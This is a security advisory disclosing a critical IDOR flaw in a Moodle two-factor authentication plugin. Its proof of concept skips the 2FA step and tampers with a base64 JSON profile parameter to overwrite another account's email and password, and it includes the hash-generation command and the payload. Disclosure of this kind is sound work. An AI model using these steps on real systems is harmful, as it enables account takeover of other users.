A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor

Vulnerability Details

Risk : Critical

Vendor: LMS Doctor - Simple 2 Factor Authentication Plugin For Moodle

Disclosed by: Flaviu Popescu

Description: Insecure direct object references (IDOR) vulnerability in The Simple 2FA Plugin for Moodle by "LMS Doctor". Allows remote attackers to update sensitive records such as email, password and phone number of other user accounts.

Proof of concept:

Initial login process using a self-registered account (dionach.tester):

POST /login/index.php

Once the 2FA prompt is shown, the attacker force browses to the following URL instead of providing the 2FA code.

POST /auth/simple2fa/profile.php

This request is captured in Burp Suite:

The parameter "u" contains a base64 encoded string. The string is decoded, which reveals data in JSON format as shown below:

The attacker tampers with the JSON data, modifying the id, e-mail, password, and the name. The JSON data is encoded back into base64, updated in Burp Suite, and forwarded to the server.

New hash generation for the password:

$ htpasswd -bnBC 10 "" pwn3d! | tr -d ':\n'\n
$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy                     

Snipped of tampered data:

{"id":"8045","auth":"email","confirmed":"1","policyagreed":"0","deleted":"0","suspended":"0","mnethostid":"1","username":"dionach.tester2","password":"$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy","idnumber":"","firstname":"Dio","lastname":"Nach","email":"flaviu.popescu+1337@[..]", [..]

Resulting in the victim's account, id 8045 (dionach.tester2) being updated as shown below: